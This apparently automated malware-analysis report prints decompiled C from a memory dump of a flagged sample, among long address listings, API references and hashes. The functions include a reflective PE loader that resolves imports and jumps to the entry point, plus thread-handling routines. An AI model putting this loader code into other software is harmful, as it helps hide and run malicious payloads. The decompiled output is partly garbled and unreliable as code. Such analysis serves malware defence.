                                                                                                                                                                                                0x00b03139
                                                                                                                                                                                                0x00b03144
                                                                                                                                                                                                0x00b02fe7
                                                                                                                                                                                                0x00b02fe7
                                                                                                                                                                                                0x00b02fea
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02fec
                                                                                                                                                                                                0x00b02fec
                                                                                                                                                                                                0x00b02fee
                                                                                                                                                                                                0x00b02ff2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02ff4
                                                                                                                                                                                                0x00b02ff4
                                                                                                                                                                                                0x00b02ff4
                                                                                                                                                                                                0x00b02ff7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02ffb
                                                                                                                                                                                                0x00b03004
                                                                                                                                                                                                0x00b03004
                                                                                                                                                                                                0x00b02ff7
                                                                                                                                                                                                0x00b02ff2
                                                                                                                                                                                                0x00b02fea
                                                                                                                                                                                                0x00b02fd6
                                                                                                                                                                                                0x00b02fdf
                                                                                                                                                                                                0x00b02fdf

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                                • Opcode ID: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
                                                                                                                                                                                                • Instruction ID: a717f7419f3d52e66a13698972949a04bc408bd0610980512010a89067b564af
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CD116716006019FCB28CF6DC8C4A6ABBF5FF98744B2489ADE88AC7791D771E944CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00B02B24, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 52%
                                                                                                                                                                                                			E00B02B24(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                                                                                                                                                                                                0x00b02b33
                                                                                                                                                                                                0x00b02b39
                                                                                                                                                                                                0x00b02b42
                                                                                                                                                                                                0x00b02b45
                                                                                                                                                                                                0x00b02b48
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02c39
                                                                                                                                                                                                0x00b02c3d
                                                                                                                                                                                                0x00b02c3f
                                                                                                                                                                                                0x00b02c4d
                                                                                                                                                                                                0x00b02d6b
                                                                                                                                                                                                0x00b02d74
                                                                                                                                                                                                0x00b02d77
                                                                                                                                                                                                0x00b02d7b
                                                                                                                                                                                                0x00b02d81
                                                                                                                                                                                                0x00b02d89
                                                                                                                                                                                                0x00b02d89
                                                                                                                                                                                                0x00b02d91
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02d9c
                                                                                                                                                                                                0x00b02c53
                                                                                                                                                                                                0x00b02c5c
                                                                                                                                                                                                0x00b02c6a
                                                                                                                                                                                                0x00b02c6d
                                                                                                                                                                                                0x00b02c8a
                                                                                                                                                                                                0x00b02c91
                                                                                                                                                                                                0x00b02ca3
                                                                                                                                                                                                0x00b02ca3
                                                                                                                                                                                                0x00b02caa
                                                                                                                                                                                                0x00b02cba
                                                                                                                                                                                                0x00b02cd2
                                                                                                                                                                                                0x00b02cbc
                                                                                                                                                                                                0x00b02cc4
                                                                                                                                                                                                0x00b02cc4
                                                                                                                                                                                                0x00b02cd5
                                                                                                                                                                                                0x00b02cd9
                                                                                                                                                                                                0x00b02ce9
                                                                                                                                                                                                0x00b02d0c
                                                                                                                                                                                                0x00b02d1e
                                                                                                                                                                                                0x00b02ceb
                                                                                                                                                                                                0x00b02cff
                                                                                                                                                                                                0x00b02cff
                                                                                                                                                                                                0x00b02d28
                                                                                                                                                                                                0x00b02d44
                                                                                                                                                                                                0x00b02d2a
                                                                                                                                                                                                0x00b02d39
                                                                                                                                                                                                0x00b02d39
                                                                                                                                                                                                0x00b02d4c
                                                                                                                                                                                                0x00b02d55
                                                                                                                                                                                                0x00b02d55
                                                                                                                                                                                                0x00b02d63
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02cac
                                                                                                                                                                                                0x00b02cae
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02cae
                                                                                                                                                                                                0x00b02caa
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02c6d
                                                                                                                                                                                                0x00b02b50
                                                                                                                                                                                                0x00b02b5e
                                                                                                                                                                                                0x00b02b63
                                                                                                                                                                                                0x00b02b6e
                                                                                                                                                                                                0x00b02b71
                                                                                                                                                                                                0x00b02b75
                                                                                                                                                                                                0x00b02b77
                                                                                                                                                                                                0x00b02b87
                                                                                                                                                                                                0x00b02b90
                                                                                                                                                                                                0x00b02b99
                                                                                                                                                                                                0x00b02ba1
                                                                                                                                                                                                0x00b02baa
                                                                                                                                                                                                0x00b02bb5
                                                                                                                                                                                                0x00b02bbb
                                                                                                                                                                                                0x00b02bbe
                                                                                                                                                                                                0x00b02bc1
                                                                                                                                                                                                0x00b02bc8
                                                                                                                                                                                                0x00b02bcf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02bda
                                                                                                                                                                                                0x00b02be8
                                                                                                                                                                                                0x00b02bf3
                                                                                                                                                                                                0x00b02bfd
                                                                                                                                                                                                0x00b02c15
                                                                                                                                                                                                0x00b02c22
                                                                                                                                                                                                0x00b02c22
                                                                                                                                                                                                0x00b02bff
                                                                                                                                                                                                0x00b02c0a
                                                                                                                                                                                                0x00b02c0a
                                                                                                                                                                                                0x00b02c29
                                                                                                                                                                                                0x00b02c29
                                                                                                                                                                                                0x00b02c31
                                                                                                                                                                                                0x00b02c31
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 00B02C84
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00B02C9D
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00B02CF9
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00B02D18
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 384173800-0
                                                                                                                                                                                                • Opcode ID: efdd5e6a085ebbd1de0e5b4470ab25be3f012cfe7c513c746d9e6d4a77ccdf4a
                                                                                                                                                                                                • Instruction ID: 99e8a0fb3682c9f2769840968035288fa094569006acb8fdf4a495e14bf4ceff
                                                                                                                                                                                                • Opcode Fuzzy Hash: efdd5e6a085ebbd1de0e5b4470ab25be3f012cfe7c513c746d9e6d4a77ccdf4a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BA16A75A00209DFDB14CF98C885AADBBF1FF08314F1485A9E815EB391D734AA85CF64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF1C51, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                			E00AF1C51(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0xb0e6dc; // 0x384
				_t13 = E00AFA501(_t41, 0);
				while(_t13 < 0) {
					E00AF97ED( &_v28);
					_t43 =  *0xb0e6e0; // 0x0
					_t15 =  *0xb0e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0xb0e684; // 0x4d3f6c8
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xb0e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0xb0e6dc; // 0x384
						__eflags = 0;
						_t13 = E00AFA501(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0xb0e6e8; // 0x4d3fb90
				_v28 = _t20;
				_t22 = E00AFA6EB(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xb0e6d0, 0, 0, 2);
					E00AF97ED(0xb0e6e0);
					_t64 = E00AF1A01( &_v28, E00AF1226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0xb0e760);
						_t51 = 0x27;
						E00AF9ED1(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t29 + 0x30))( *0xb0e6d0);
				_t48 =  *0xb0e6dc; // 0x384
				 *0xb0e6d0 = 0;
				E00AFA51D(_t48);
				E00AF85FB( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                                                                                                                                                                                                0x00af1c51
                                                                                                                                                                                                0x00af1c5e
                                                                                                                                                                                                0x00af1c60
                                                                                                                                                                                                0x00af1c67
                                                                                                                                                                                                0x00af1ccd
                                                                                                                                                                                                0x00af1c74
                                                                                                                                                                                                0x00af1c79
                                                                                                                                                                                                0x00af1c7f
                                                                                                                                                                                                0x00af1c84
                                                                                                                                                                                                0x00af1c8a
                                                                                                                                                                                                0x00af1c8c
                                                                                                                                                                                                0x00af1c90
                                                                                                                                                                                                0x00af1cfe
                                                                                                                                                                                                0x00af1d00
                                                                                                                                                                                                0x00af1d82
                                                                                                                                                                                                0x00af1d88
                                                                                                                                                                                                0x00af1d88
                                                                                                                                                                                                0x00af1c92
                                                                                                                                                                                                0x00af1c9a
                                                                                                                                                                                                0x00af1c9a
                                                                                                                                                                                                0x00af1ca6
                                                                                                                                                                                                0x00af1cac
                                                                                                                                                                                                0x00af1cae
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1cb0
                                                                                                                                                                                                0x00af1cba
                                                                                                                                                                                                0x00af1cc0
                                                                                                                                                                                                0x00af1cc6
                                                                                                                                                                                                0x00af1cc8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1cc8
                                                                                                                                                                                                0x00af1c94
                                                                                                                                                                                                0x00af1c98
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1c98
                                                                                                                                                                                                0x00af1cd7
                                                                                                                                                                                                0x00af1cd8
                                                                                                                                                                                                0x00af1cd9
                                                                                                                                                                                                0x00af1cda
                                                                                                                                                                                                0x00af1cdb
                                                                                                                                                                                                0x00af1ce0
                                                                                                                                                                                                0x00af1cea
                                                                                                                                                                                                0x00af1cef
                                                                                                                                                                                                0x00af1cf7
                                                                                                                                                                                                0x00af1d12
                                                                                                                                                                                                0x00af1d15
                                                                                                                                                                                                0x00af1d1f
                                                                                                                                                                                                0x00af1d2a
                                                                                                                                                                                                0x00af1d3d
                                                                                                                                                                                                0x00af1d3f
                                                                                                                                                                                                0x00af1d41
                                                                                                                                                                                                0x00af1d43
                                                                                                                                                                                                0x00af1d44
                                                                                                                                                                                                0x00af1d4c
                                                                                                                                                                                                0x00af1d4d
                                                                                                                                                                                                0x00af1d53
                                                                                                                                                                                                0x00af1cf9
                                                                                                                                                                                                0x00af1cf9
                                                                                                                                                                                                0x00af1cf9
                                                                                                                                                                                                0x00af1d54
                                                                                                                                                                                                0x00af1d5f
                                                                                                                                                                                                0x00af1d62
                                                                                                                                                                                                0x00af1d68
                                                                                                                                                                                                0x00af1d6e
                                                                                                                                                                                                0x00af1d79
                                                                                                                                                                                                0x00af1d80
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 9182654c420f2497732b53c1899954b20d7fdd6af7fda1184218cd76c549e17a
                                                                                                                                                                                                • Instruction ID: 291b3c1e97c483f39489d58463e48e5b9b1d9e0ebc454fbb618cec51246294fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9182654c420f2497732b53c1899954b20d7fdd6af7fda1184218cd76c549e17a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7131A3726082099FD304EFA4FD8597A77A9FB64354F000A2AF725C72A1DE31DD04D752
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF1B16, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                			E00AF1B16(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0xb0e6f4; // 0x380
				_t12 = E00AFA501(_t38, 0);
				while(_t12 < 0) {
					E00AF97ED( &_v28);
					_t40 =  *0xb0e700; // 0x0
					_t14 =  *0xb0e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0xb0e684; // 0x4d3f6c8
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xb0e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0xb0e684; // 0x4d3f6c8
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0xb0e6f4; // 0x380
								__eflags = 0;
								_t12 = E00AFA501(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E00AF97ED(0xb0e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xb0e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0xb0e6e8; // 0x4d3fb90
				_v28 = _t24;
				_t61 = E00AF1A01( &_v28, E00AF1310, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0xb0e760);
					_t48 = 0x27;
					E00AF9ED1(_t48);
				}
				if(_v24 != 0) {
					E00AF6871( &_v24);
				}
				_t26 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t26 + 0x30))( *0xb0e6ec);
				_t28 =  *0xb0e758; // 0x0
				 *0xb0e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0xb0e6f4; // 0x380
				 *0xb0e758 =  !=  ? 1 : _t28;
				E00AFA51D(_t46);
				_t15 = _t61;
				goto L12;
			}
























                                                                                                                                                                                                0x00af1b16
                                                                                                                                                                                                0x00af1b1c
                                                                                                                                                                                                0x00af1b2a
                                                                                                                                                                                                0x00af1b98
                                                                                                                                                                                                0x00af1b37
                                                                                                                                                                                                0x00af1b3c
                                                                                                                                                                                                0x00af1b42
                                                                                                                                                                                                0x00af1b47
                                                                                                                                                                                                0x00af1b4d
                                                                                                                                                                                                0x00af1b4f
                                                                                                                                                                                                0x00af1b53
                                                                                                                                                                                                0x00af1c4d
                                                                                                                                                                                                0x00af1c4d
                                                                                                                                                                                                0x00af1b59
                                                                                                                                                                                                0x00af1b59
                                                                                                                                                                                                0x00af1b65
                                                                                                                                                                                                0x00af1b65
                                                                                                                                                                                                0x00af1b71
                                                                                                                                                                                                0x00af1b77
                                                                                                                                                                                                0x00af1b79
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1b7b
                                                                                                                                                                                                0x00af1b7b
                                                                                                                                                                                                0x00af1b85
                                                                                                                                                                                                0x00af1b8b
                                                                                                                                                                                                0x00af1b91
                                                                                                                                                                                                0x00af1b93
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1b93
                                                                                                                                                                                                0x00af1b5b
                                                                                                                                                                                                0x00af1b5b
                                                                                                                                                                                                0x00af1b5f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1b5f
                                                                                                                                                                                                0x00af1b59
                                                                                                                                                                                                0x00af1c46
                                                                                                                                                                                                0x00af1c4c
                                                                                                                                                                                                0x00af1c4c
                                                                                                                                                                                                0x00af1ba1
                                                                                                                                                                                                0x00af1bb5
                                                                                                                                                                                                0x00af1bb8
                                                                                                                                                                                                0x00af1bc2
                                                                                                                                                                                                0x00af1bce
                                                                                                                                                                                                0x00af1bd8
                                                                                                                                                                                                0x00af1bd9
                                                                                                                                                                                                0x00af1bda
                                                                                                                                                                                                0x00af1bdb
                                                                                                                                                                                                0x00af1be0
                                                                                                                                                                                                0x00af1be9
                                                                                                                                                                                                0x00af1bed
                                                                                                                                                                                                0x00af1bef
                                                                                                                                                                                                0x00af1bf0
                                                                                                                                                                                                0x00af1bf8
                                                                                                                                                                                                0x00af1bf9
                                                                                                                                                                                                0x00af1bff
                                                                                                                                                                                                0x00af1c04
                                                                                                                                                                                                0x00af1c0a
                                                                                                                                                                                                0x00af1c0a
                                                                                                                                                                                                0x00af1c0f
                                                                                                                                                                                                0x00af1c1a
                                                                                                                                                                                                0x00af1c1d
                                                                                                                                                                                                0x00af1c25
                                                                                                                                                                                                0x00af1c31
                                                                                                                                                                                                0x00af1c34
                                                                                                                                                                                                0x00af1c3a
                                                                                                                                                                                                0x00af1c3f
                                                                                                                                                                                                0x00af1c44
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00B0E6EC,00000000,00000000,00000002), ref: 00AF1BB5
                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00AF1BB8
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00AF1BBF
                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 00AF1BC2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Current$Process$DuplicateHandleThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3566409357-0
                                                                                                                                                                                                • Opcode ID: 6557f3509df8c32be2faaa45f07fce551f3ff565a6f4825a355a6b2377201a5f
                                                                                                                                                                                                • Instruction ID: 73fac598a67c4f8d711093f6a50e7e7ed67a20574a7b92f1bbe6d1eb99d1f837
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6557f3509df8c32be2faaa45f07fce551f3ff565a6f4825a355a6b2377201a5f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 70317C71604219DFD718EFA4ED8993A77A8EB74390B000D68F726C72A1DE31EC05CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF1A01, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                			E00AF1A01(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				CHAR* _v20;
				char _v36;
				signed short _t23;
				CHAR* _t24;
				CHAR* _t25;
				CHAR* _t33;
				char _t38;
				intOrPtr _t39;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr* _t55;
				void* _t57;
				signed int _t59;
				signed int _t60;
				signed int _t63;
				CHAR* _t65;
				void* _t75;

				_t75 = __fp0;
				_t39 = __ecx;
				_v16 = __edx;
				_t38 = 0;
				_t55 =  *0xb0e6f0; // 0x4d32d68
				_push(_t59);
				_t60 = _t59 | 0xffffffff;
				_v12 = __ecx;
				_t65 = _t60;
				if( *_t55 != 0) {
					L6:
					_t23 =  *0xb0e6fc; // 0x0
					_t73 = _t23;
					if(_t23 == 0) {
						goto L9;
					} else {
						_t25 = E00AF15F3(_v16, _t55, _t73, _t23 & 0x0000ffff, _t39);
						_t65 = _t25;
						if(_t65 < 0) {
							goto L9;
						} else {
						}
					}
				} else {
					_t49 =  *0xb0e778; // 0x4d3f9f0
					_push(0);
					_push(0);
					_t57 = 0x2d;
					_v8 = E00AF9F60(_t49, _t57);
					_t33 = E00AF9E47(0x2e);
					_t58 = _v8;
					_v20 = _t33;
					if(_v8 != 0 && _t33 != _t60) {
						_t52 =  *0xb0e6f0; // 0x4d32d68
						E00AF96AB(_t52, _t58, 0x100);
						 *0xb0e6fc = _v20;
					}
					E00AF85FB( &_v8, _t60);
					_t55 =  *0xb0e6f0; // 0x4d32d68
					if( *_t55 == _t38) {
						L9:
						_v8 = _t38;
						_t24 = E00AF175E( &_v8, _t75);
						_v20 = _t24;
						__eflags = _t24;
						if(_t24 != 0) {
							__eflags = _v8 - _t38;
							if(_v8 > _t38) {
								_t14 =  &(_t24[4]); // 0x4
								_t63 = _t14;
								while(1) {
									__eflags =  *_t63;
									if(__eflags != 0) {
										__imp__#12(0x10);
										lstrcpynA( &_v36, _t24,  *_t63);
										_t24 = E00AF15F3(_v16,  &_v36, __eflags,  *(_t63 + 4) & 0x0000ffff, _v12);
										_t65 = _t24;
									}
									__eflags = _t65;
									if(_t65 >= 0) {
										break;
									}
									_t38 = _t38 + 1;
									_t63 = _t63 + 0x20;
									__eflags = _t38 - _v8;
									if(_t38 < _v8) {
										continue;
									}
									break;
								}
								_t60 = _t63 | 0xffffffff;
								__eflags = _t60;
							}
							E00AF85FB( &_v20, _v8);
						}
						__eflags = _t65;
						_t61 =  >=  ? _t65 : _t60;
						_t25 =  >=  ? _t65 : _t60;
					} else {
						_t39 = _v12;
						goto L6;
					}
				}
				return _t25;
			}























                                                                                                                                                                                                0x00af1a01
                                                                                                                                                                                                0x00af1a01
                                                                                                                                                                                                0x00af1a08
                                                                                                                                                                                                0x00af1a0b
                                                                                                                                                                                                0x00af1a0d
                                                                                                                                                                                                0x00af1a14
                                                                                                                                                                                                0x00af1a15
                                                                                                                                                                                                0x00af1a18
                                                                                                                                                                                                0x00af1a1b
                                                                                                                                                                                                0x00af1a1f
                                                                                                                                                                                                0x00af1a7f
                                                                                                                                                                                                0x00af1a7f
                                                                                                                                                                                                0x00af1a85
                                                                                                                                                                                                0x00af1a88
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1a8a
                                                                                                                                                                                                0x00af1a92
                                                                                                                                                                                                0x00af1a97
                                                                                                                                                                                                0x00af1a9d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1a9f
                                                                                                                                                                                                0x00af1a9d
                                                                                                                                                                                                0x00af1a21
                                                                                                                                                                                                0x00af1a21
                                                                                                                                                                                                0x00af1a27
                                                                                                                                                                                                0x00af1a28
                                                                                                                                                                                                0x00af1a2b
                                                                                                                                                                                                0x00af1a33
                                                                                                                                                                                                0x00af1a36
                                                                                                                                                                                                0x00af1a3b
                                                                                                                                                                                                0x00af1a41
                                                                                                                                                                                                0x00af1a46
                                                                                                                                                                                                0x00af1a4c
                                                                                                                                                                                                0x00af1a57
                                                                                                                                                                                                0x00af1a60
                                                                                                                                                                                                0x00af1a60
                                                                                                                                                                                                0x00af1a6b
                                                                                                                                                                                                0x00af1a70
                                                                                                                                                                                                0x00af1a7a
                                                                                                                                                                                                0x00af1aa1
                                                                                                                                                                                                0x00af1aa4
                                                                                                                                                                                                0x00af1aa7
                                                                                                                                                                                                0x00af1aac
                                                                                                                                                                                                0x00af1aaf
                                                                                                                                                                                                0x00af1ab1
                                                                                                                                                                                                0x00af1ab3
                                                                                                                                                                                                0x00af1ab6
                                                                                                                                                                                                0x00af1ab8
                                                                                                                                                                                                0x00af1ab8
                                                                                                                                                                                                0x00af1abb
                                                                                                                                                                                                0x00af1abb
                                                                                                                                                                                                0x00af1abe
                                                                                                                                                                                                0x00af1ac4
                                                                                                                                                                                                0x00af1acf
                                                                                                                                                                                                0x00af1ae3
